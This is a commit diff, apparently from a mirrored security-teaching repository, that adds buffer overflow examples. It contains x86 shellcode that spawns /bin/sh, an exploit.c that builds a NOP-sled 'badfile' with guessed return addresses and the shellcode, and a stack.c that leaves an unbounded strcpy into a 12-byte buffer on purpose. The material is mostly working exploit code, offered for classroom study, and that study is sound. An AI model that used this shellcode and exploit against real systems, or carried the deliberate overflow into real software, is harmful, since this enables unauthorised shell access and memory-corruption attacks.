mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-10-01 01:25:43 -04:00
adding buffer overflow examples
This commit is contained in:
parent
81da9ec76d
commit
0f5a65b7a5
3
.vscode/settings.json
vendored
Normal file
3
.vscode/settings.json
vendored
Normal file
@ -0,0 +1,3 @@
|
||||
{
|
||||
"C_Cpp.errorSquiggles": "Disabled"
|
||||
}
|
27
buffer_overflow_example/demeter/call_shellcode.c
Normal file
27
buffer_overflow_example/demeter/call_shellcode.c
Normal file
@ -0,0 +1,27 @@
|
||||
/* call_shellcode.c */
|
||||
|
||||
/* This program will create a file containing code for launching a shell */
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
const char code[] =
|
||||
"\x31\xc0" /* xorl %eax,%eax */
|
||||
"\x50" /* pushl %eax */
|
||||
"\x68""//sh" /* pushl $0x68732f2f */
|
||||
"\x68""/bin" /* pushl $0x6e69622f */
|
||||
"\x89\xe3" /* movl %esp,%ebx */
|
||||
"\x50" /* pushl %eax */
|
||||
"\x53" /* pushl %ebx */
|
||||
"\x89\xe1" /* movl %esp,%ecx */
|
||||
"\x99" /* cdq */
|
||||
"\xb0\x0b" /* movb $0x0b,%al */
|
||||
"\xcd\x80" /* int $0x80 */
|
||||
;
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
char buf[sizeof(code)];
|
||||
strcpy(buf, code);
|
||||
((void(*)( ))buf)( );
|
||||
}
|
69
buffer_overflow_example/demeter/exploit.c
Normal file
69
buffer_overflow_example/demeter/exploit.c
Normal file
@ -0,0 +1,69 @@
|
||||
//exploit.c
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#define DEFAULT_OFFSET 350
|
||||
|
||||
char code[]=
|
||||
"\x31\xc0"
|
||||
"\x50"
|
||||
"\x68""//sh"
|
||||
"\x68""/bin"
|
||||
"\x89\xe3"
|
||||
"\x50"
|
||||
"\x53"
|
||||
"\x89\xe1"
|
||||
"\x99"
|
||||
"\xb0\x0b"
|
||||
"\xcd\x80"
|
||||
;
|
||||
|
||||
unsigned long get_sp(void)
|
||||
{
|
||||
__asm__("movl %esp,%eax");
|
||||
}
|
||||
|
||||
void main(int argc, char **argv)
|
||||
{
|
||||
char buffer[517];
|
||||
FILE *badfile;
|
||||
char *ptr;
|
||||
long *a_ptr,ret;
|
||||
|
||||
int offset = DEFAULT_OFFSET;
|
||||
int codeSize = sizeof(code);
|
||||
int buffSize = sizeof(buffer);
|
||||
|
||||
if(argc > 1) offset = atoi(argv[1]); //this allows for command line input
|
||||
|
||||
ptr=buffer;
|
||||
a_ptr = (long *) ptr;
|
||||
|
||||
/* Initialize buffer with 0x90 (NOP instruction) */
|
||||
memset(buffer, 0x90, buffSize);
|
||||
|
||||
//----------------------BEGIN FILL BUFFER----------------------\\
|
||||
|
||||
ret = get_sp()+offset;
|
||||
printf("Return Address: 0x%x\n",get_sp());
|
||||
printf("Address: 0x%x\n",ret);
|
||||
|
||||
ptr = buffer;
|
||||
a_ptr = (long *) ptr;
|
||||
|
||||
int i;
|
||||
for (i = 0; i < 300;i+=4)
|
||||
*(a_ptr++) = ret;
|
||||
|
||||
for(i = 486;i < codeSize + 486;++i)
|
||||
buffer[i] = code[i-486];
|
||||
|
||||
buffer[buffSize - 1] = '\0';
|
||||
//-----------------------END FILL BUFFER-----------------------\\
|
||||
|
||||
|
||||
/* Save the contents to the file "badfile" */
|
||||
badfile = fopen("./badfile", "w");
|
||||
fwrite(buffer,517,1,badfile);
|
||||
fclose(badfile);
|
||||
}
|
29
buffer_overflow_example/demeter/stack.c
Normal file
29
buffer_overflow_example/demeter/stack.c
Normal file
@ -0,0 +1,29 @@
|
||||
/* stack.c */
|
||||
|
||||
/* This is the program that introduces the buffer overflow vulnerability. */
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
int bof(char *str)
|
||||
{
|
||||
char buffer[12];
|
||||
|
||||
/* Can you spot the buffer overflow here? ;-) */
|
||||
strcpy(buffer, str);
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
char str[517];
|
||||
FILE *badfile;
|
||||
|
||||
badfile = fopen("badfile", "r");
|
||||
fread(str, sizeof(char), 517, badfile);
|
||||
bof(str);
|
||||
|
||||
printf("Returned Properly\n");
|
||||
return 1;
|
||||
}
|
Loading…
Reference in New Issue
Block a user